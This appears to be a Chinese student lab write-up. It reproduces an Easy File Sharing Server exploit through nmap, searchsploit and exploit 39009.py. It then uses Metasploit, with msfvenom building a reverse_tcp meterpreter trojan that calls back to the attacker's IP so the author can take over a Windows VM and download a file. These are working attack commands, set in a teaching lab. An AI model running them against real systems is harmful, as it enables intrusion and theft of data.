复现任务(利用efssetup漏洞的简单测试)

发布时间 2024-01-03 03:24:40作者: 路肆ly

一、Easy File Sharing Server漏洞复现

(一)任务要求

1、靶机(Windows)安装easy file sharing server(efssetup_2018.zip),该服务存在漏洞。
2、利用Nmap扫描发现靶机(Windows)运行了该服务。
3、利用该漏洞,使得靶机运行计算器。 见第六章PPT或PDF文档

(二)过程

1.要安装一个windows虚拟机来当做靶机。 

 2.把下载好的easy file sharing 拖动到靶机中进行安装。

(1) 点击try it。

(2)将端口号改为8080。

 

 

3.打开kali虚拟机,使用Nmap功能,发现8080端口运行着easy file sharing server服务。

 命令:nmap -sV -A -o easy-file.txt ip 扫描(sV 服务版本识别、-A 强力检测选项,得到更多信息、-o 将扫描结果写入文件)

4.我们使用命令:searchsploit easy file sharing 得到这个画面。

 图中左栏是渗透模块的名称,右侧是对应的位置

我们的目的是打开靶机的计算器,位置是usr/share/exploitdb/exploits/windows/remote/39009.py

5.在kali打开另一个终端来执行命令,命令格式如下:python2 位置 靶机ip 端口号 。

python2 /usr/share/exploitdb/exploits/windows/remote/39009.py 192.168.223.137 8080

回到靶机发现计算器已经被打开,复现完成。

 

二、Metasploit应用

(一)任务要求

1、生成主控端、被控端。
2、获得靶机(Windows)控制权。
3、下载靶机上任意一个文件。见课本P127-133

 (二)过程

1、复现环境

攻击机

系统:kali-Linux 

IP地址:192.168.223.134

靶机

系统:Windows7

IP地址: 192.168.223.137

2、生成主控端与被控端

(1)生成主控端

使用命令msfconsole,打开msfconsole。

 

依次使用命令:

use exploit/multi/handler
 set payload windows/meterpreter/reverse_tcp
 set lhost 192.168.223.134
 set lport 5000
 exploit

 

(2)生成受控端

使用命令:msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.223.134 lport=5000 -f exe -o /root/payload.exe

在这段命令中lhost是你本机(kali)的ip地址,lport和lhost要和上面生成主控端的代码一致 

这个命令的作用是在/root/目录下生成一个payload.exe文件,这个payload文件实际上就是一个可以对Windows进行操作的木马程序。

生成结果如下

 在文件系统中的root 可以看到成功生成payload.exe。

3、获得靶机(Windows)控制权 

(1)、将文件复制到Windows中

 

(1)将文件在靶机中运行后,kali的终端会出现以下界面

 并用ls控制查看木马所在目录的文件

先提前在靶机上新建个2.txt文件,然后在kali中下载。

 即在home/ly中看到下载文件。